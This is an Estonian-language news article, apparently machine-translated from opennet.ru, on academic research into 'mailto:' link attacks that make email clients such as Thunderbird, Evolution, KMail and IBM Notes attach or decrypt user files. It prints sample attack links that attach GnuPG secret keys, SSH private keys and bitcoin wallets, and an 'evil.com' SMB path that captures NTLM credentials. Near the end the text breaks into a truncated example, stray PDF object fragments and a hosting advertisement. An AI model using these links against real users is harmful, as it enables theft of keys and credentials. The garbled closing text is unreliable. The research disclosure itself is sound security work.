Rünnakud postikliendi kasutajate vastu läbi linkide «mailto:»

Ruhr Ülikooli teadlased Bochumist (Saksamaa) analüüsisid (PDF) meiliteenuste käitumine, kui töötada "mailto:" linkide koos laiendatud parameetritega. Kaheksast kahekümnest uuritud meiliteenusest viis olid haavatavad rünnaku suhtes, mis manipuleeris ressursside asemele panemisega parameetri "attach" kaudu. Veel kuus meiliteenust olid vastuvõtlikud PGP ja S/MIME võtmete vahetuse rünnakule, samas kui kolm teenust olid haavatavad krüpteeritud sõnumite sisu väljavõtu rünnaku suhtes.

Linke "mailto:" kasutatakse postkasti avamise automatiseerimiseks, et kirjutada kiri määratud lingis adresseeritud isikule. Linki koostises saab välja tuua lisaparameetreid, nagu näiteks kirja teema ja standardse sisu mall. Pakutav rünnak manipuleerib parameetriga "attach", mis võimaldab luua kirja juurde lisatud faili.

Meiliteenused Thunderbird, GNOME Evolution (CVE-2020-11879), KDE KMail (CVE-2020-11880), IBM/HCL Notes (CVE-2020-4089) ja Pegasus Mail osutusid triviaalsetele rünnakutele vastuvõtlikuks, mis võimaldas automaatselt kinnitada mis tahes kohalikku faili, mis on määratud "mailto:?attach=faili_tee" lingi kaudu. Fail kinnitatakse ilma hoiatusteta, seega võib kasutaja, kui ei pöörata erilist tähelepanu, mitte märgata, et kiri saadetakse koos manusega.

Näiteks, kasutades linki "mailto:?to=user@example.com&subject=Pealkiri&body=Tekst&attach=~/.gnupg/secring.gpg", on võimalik lisada kirjale GnuPG suletud võtmed. Samuti on võimalik saata krüptokottide sisu (~/.bitcoin/wallet.dat), SSH-võtmed (~/.ssh/id_rsa) ja kõik muud kasutajale kättesaadavad failid. Veelgi enam, Thunderbird võimaldab kinnitada faili rühmi, kasutades mustreid, nagu "attach=/tmp/*.txt".

Lisaks kohalikele failidele töötlevad mõned meiliteenused linke võrguhoidlates ja IMAP-serveri teedega. Eelkõige võimaldab IBM Notes edastada faili võrgukataloogist, töötledes linke nagu "attach=\\evil.com\dummyfile", ning ka püüdma NTLM autentimise parameetreid, suunates lingi SMB-serverisse, mis on ründaja kontrolli all (päring saadetakse praeguste kasutaja autentimise parameetritega).

Thunderbird töötleb edasimises olevaid päringuid vormingus „attach=imap://fetch>UID>/INBOX>1/“, mis võimaldavad lisada sisu IMAP-serveri kaustadest. Sel juhul dekrüpteeritakse automaatselt OpenPGP ja S/MIME kaudu krüpteeritud IMAP-i postitused e-posti kliendi poolt enne saatmist. Thunderbirdi arendajad olid teavitatud probleemist veebruaris ja versioonis Thunderbird 78 on probleem juba lahendatud (Thunderbird 52, 60 ja 68 versioonid jäävad haavatavaks).

Vanad Thunderbirdi versioonid osutusid haavatavaks ka kahe teise PGP ja S/MIME rünnaku suhtes, mille pakkusid välja teadlased. Eeskätt oli rünnak asendamisel, mis suunati Thunderbirdile, samuti OutLookile, PostBoxile, eM Clientile, MailMate'ile ja R2Mail2-le, see tulenes sellest, et e-posti klient importis ja installis automaatselt uusi sertifikaate, mis edastatakse S/MIME sõnumites, andes ründajale võimaluse asendada juba kasutaja salvestatud avalikke võtmeid.

Teine rünnak, millele on vastuvõtlikud Thunderbird, PostBox ja MailMate, manipuleerib sõnumite mustandite automaatse salvestuse mehhanismi omadustega ja võimaldab mailto parameetrite abil algatada krüpteeritud sõnumite dekrüpteerimise või digitaalse allkirja lisamise suvalistele sõnumitele, mille tulemuse ründaja IMAP-serverisse edastab. Krüptotext edastatakse selle rünnaku käigus parameetri „body“ kaudu, samas kui ründaja IMAP-serverisse pöördumise algatamiseks kasutatakse „meta refresh“ sildi. Näiteks: ‘<meta http-equiv=

mailto:

%PDF-1.5
1 0 obj
<>
endobj

2 0 obj
<>
endobj

Rünnak e-posti klientide kasutajate vastu linksidega "mailto:" kaudu

Allikas: opennet.ru

Osta usaldusväärne hostimine veebilehtede jaoks DDoS-i kaitsega, VPS VDS serverid 🔥 Osta usaldusväärne hostimine veebilehtede jaoks DDoS-i kaitsega, VPS VDS serverid | ProHoster